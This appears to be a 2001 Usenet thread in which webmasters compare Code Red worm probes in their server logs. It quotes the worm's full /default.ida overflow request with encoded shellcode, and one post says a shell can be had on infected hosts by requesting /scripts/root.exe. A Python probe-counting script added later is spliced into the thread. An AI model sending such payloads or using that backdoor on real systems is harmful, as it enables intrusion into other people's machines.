code red attempts

Is everyone else getting a bunch of sites looking for

/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN-
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNN-
NNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u909-
0%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u007-
8%u0000%u00=a

Should I waste my time trying to let people know how dumb they are?


Adam Gordon SBA Design - web site and graphic design
http://www.sbadesign.com adam@sbadesign.com

On Sun, 5 Aug 2001 02:23:24 -0400 Adam Gordon said…

> Should I waste my time trying to let people know how dumb they are?
>

There was a new version of Code Red that hit today. There is a story on
/. about it right now with some links in the comments about where to send
the reports.


John R. Marshall JRM Studios.com - http://www.jrmstudios.com The
Hotrodding Network - http://www.hotrodding.net

I’m getting a fucking TON of:
xxx.xxx.xxx.xxx - - [05/Aug/2001:04:48:03 -0400] “GET /default.ida?XXXXXX-
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXX-
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-
XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-
XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%ucbd3%u780-
1%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801%u9090%u909-
0%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0” 404 279 “-” “-”


Sean S. <?$s=“moc.seiticoeg@osomynus”;$s=ereg_replace(
“osom”,“noom”,$s);$s=strrev($s);echo"mailto:$s";?> Hex(RGB) ->
http://thedoh.dyndns.org/hexrgb/index.php

“Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for
>
> Should I waste my time trying to let people know how dumb they are?
>
> –
> Adam Gordon SBA Design - web site and graphic design
> http://www.sbadesign.com adam@sbadesign.com

Yes, I'm getting loads of them as well

Julian Collins www.dvdoptions.com

“Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for
>
> Should I waste my time trying to let people know how dumb they are?
>
> –
> Adam Gordon SBA Design - web site and graphic design
> http://www.sbadesign.com adam@sbadesign.com

“Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for
>
> Should I waste my time trying to let people know how dumb they are?

If these are hacking attempts, why not write automatically to all webmasters
of the ISPs from which the attack occurred?


Roland Mösl http://pege.org Clear targets for a confused civilization
http://BeingFound.com Web Design starts at the search engine

536 in today’s log alone

Adam Gordon <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for
>
> Should I waste my time trying to let people know how dumb they are?
>
> –
> Adam Gordon SBA Design - web site and graphic design
> http://www.sbadesign.com adam@sbadesign.com

http://thedoh.dyndns.org/cr/ Updated every now and then…790 so far.


Sean S. <?$s=“moc.seiticoeg@osomynus”;$s=ereg_replace(
“osom”,“noom”,$s);$s=strrev($s);echo"mailto:$s";?> Hex(RGB) ->
http://thedoh.dyndns.org/hexrgb/index.php

“Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
news:9kioh2$9q$1@constitution.worldwebserver.com
> Is everyone else getting a bunch of sites looking for

On Sun, 5 Aug 2001 04:49:18 -0400 Sean S. said…

> I’m getting a fucking TON of:
> xxx.xxx.xxx.xxx - - [05/Aug/2001:04:48:03 -0400] "GET /default.ida?XXXX-
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-
> XXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX-
> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX%u9090%u6858%u-
> cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3% u7801-
> %u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u000-
> 0%u00=a HTTP/1.0" 404 279 “-” “-”

Yep you got the new one.

You might have noticed that if you telnet to port 80 and then type

GET /scripts/root.exe HTTP/1.0

you will get a command prompt. (Note! This might be considered
“hacking”; do it at your own risk!!)

BTW http://dshield.org/codered.html wants logs of all code red hits so
they can notify the owners of the infected machines.


John R. Marshall JRM Studios.com - http://www.jrmstudios.com The
Hotrodding Network - http://www.hotrodding.net

“Julian Collins” <juliancollins@dvdoptions.com> wrote in message
news:9kj3ts$22o$1@constitution.worldwebserver.com
> Yes, I'm getting loads of them as well

Would it be useful to bring all log files together, to prove that these
users did it not one time, but that they tried systematically to hack?


Roland Mösl http://pege.org Clear targets for a confused civilization
http://BeingFound.com Web Design starts at the search engine

It’s already done by ARIS with Security Focus

“Roland Mösl” <founder@pege.org> wrote in message
news:9kjg38$3nf$1@constitution.worldwebserver.com
> “Adam Gordon” <ajgordon@eden.rutgers.edu> wrote in message
> news:9kioh2$9q$1@constitution.worldwebserver.com
> > Is everyone else getting a bunch of sites looking for
> >
> > Should I waste my time trying to let people know how dumb they are?
>
> If these are hacking attempts, why not write automatically to all webmasters
> of the ISPs from which the attack occurred?
>
>
> –
> Roland Mösl http://pege.org Clear targets for a confused civilization
> http://BeingFound.com Web Design starts at the search engine
>

“John R. Marshall” <john@jrmstudios.com> wrote in message
news:MPG.15d6d75c8b3dde9c9897f5@news.worldwebserver.com
> BTW http://dshield.org/codered.html wants logs of all code red hits so
> they can notify the owners of the infected machines.

Bleh. whipped up a quickie perl script to rip out the default.ida lines…

414 attacks so far.


Sean S. <?$s=“moc.seiticoeg@osomynus”;$s=ereg_replace(
“osom”,“noom”,$s);$s=strrev($s);echo"mailto:$s";?> Hex(RGB) ->
http://thedoh.dyndns.org/hexrgb/index.php

> > Yes, I'm getting loads of them as well
>
> Would it be useful to bring all log files together, to prove that these
> users did it not one time, but that they tried systematically to hack?

No, most computers (I assume at least 1 computer had to start the attack on
purpose) are only doing the attacks because they themselves were infected.

Jon Caruana e-mail<jcaruana@home.com> Jabber<jon.c@jabber.com>
ICQ<117792886

“Sean S.” <noemail@here.blargh> wrote in message
news:9kj8ch$2kf$1@constitution.worldwebserver.com
> “John R. Marshall” <john@jrmstudios.com> wrote in message
> news:MPG.15d6d75c8b3dde9c9897f5@news.worldwebserver.com
> > BTW http://dshield.org/codered.html wants logs of all code red hits so
> > they can notify the owners of the infected machines.
>
> Bleh. whipped up a quickie perl script to rip out the default.ida
> lines…
>
> 414 attacks so far.

In this month,

107 attacks on pege.org
98 attacks on salzburgs.com
88 attacks on the-red-phone.com


Roland Mösl http://pege.org Clear targets for a confused civilization
http://BeingFound.com Web Design starts at the search engine

> > BTW http://dshield.org/codered.html wants logs of all code red hits so
> > they can notify the owners of the infected machines.
>
> Bleh. whipped up a quickie perl script to rip out the default.ida
> lines…
>
> 414 attacks so far.

370 attack attempts on my Linux masq box.

grep -c default.ida /var/log/apache/access_log

Jon Caruana e-mail<jcaruana@home.com> Jabber<jon.c@jabber.com>
ICQ<117792886
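
Going a step beyond the grep -c count above, this added example (not code posted by anyone in the thread) tallies the /default.ida probes per source host and splits them by padding letter: N as in the first post, X as in the log line John calls the new one. The log lines are constructed samples using documentation addresses, and the function names and the minimum padding length are assumptions.

```python
import re
from collections import Counter

# Apache access log: host ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# Probe shape seen in the thread: /default.ida? + a long run of one padding
# letter + %uXXXX-encoded data. The minimum run of 20 is an assumption.
PROBE_RE = re.compile(r'^/default\.ida\?([A-Za-z])\1{20,}.*%u[0-9a-f]{4}', re.I)

def classify(path):
    """Return 'N-padded', 'X-padded' or 'other-padding'; None if not a probe."""
    m = PROBE_RE.match(path)
    if not m:
        return None
    return {"N": "N-padded", "X": "X-padded"}.get(m.group(1).upper(), "other-padding")

def summarize(lines):
    """Tally probes per source host and per padding letter, and list probes
    that were not answered with a 4xx status (worth a closer look)."""
    per_host, per_variant, not_4xx = Counter(), Counter(), []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        host, when, _method, path, status = m.groups()
        variant = classify(path)
        if variant is None:
            continue
        per_host[host] += 1
        per_variant[variant] += 1
        if not status.startswith("4"):
            not_4xx.append((host, when, status))
    return per_host, per_variant, not_4xx

def probe(pad):
    # Constructed request: padding length is arbitrary, %u tail is shortened.
    return "/default.ida?" + pad * 60 + "%u9090%u6858%ucbd3%u7801%u9090=a"

# Constructed sample log lines (documentation addresses, not real sources).
SAMPLE = [
    f'192.0.2.10 - - [05/Aug/2001:04:48:03 -0400] "GET {probe("X")} HTTP/1.0" 404 279 "-" "-"',
    f'192.0.2.10 - - [05/Aug/2001:04:51:40 -0400] "GET {probe("X")} HTTP/1.0" 404 279 "-" "-"',
    f'198.51.100.7 - - [05/Aug/2001:05:02:11 -0400] "GET {probe("N")} HTTP/1.0" 404 279 "-" "-"',
    f'198.51.100.7 - - [05/Aug/2001:05:09:30 -0400] "GET {probe("N")} HTTP/1.0" 500 512 "-" "-"',
    '203.0.113.5 - - [05/Aug/2001:05:10:02 -0400] "GET /index.html HTTP/1.0" 200 5120 "-" "-"',
    '203.0.113.5 - - [05/Aug/2001:05:10:09 -0400] "GET /default.ida HTTP/1.0" 404 279 "-" "-"',
]

if __name__ == "__main__":
    hosts, variants, odd = summarize(SAMPLE)
    print(hosts.most_common(), dict(variants), odd)
```

To run it over a real log, pass an open file object to summarize() instead of SAMPLE.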

701 so far.


Sean S. <?$s=“moc.seiticoeg@osomynus”;$s=ereg_replace(
“osom”,“noom”,$s);$s=strrev($s);echo"mailto:$s";?> Hex(RGB) ->
http://thedoh.dyndns.org/hexrgb/index.php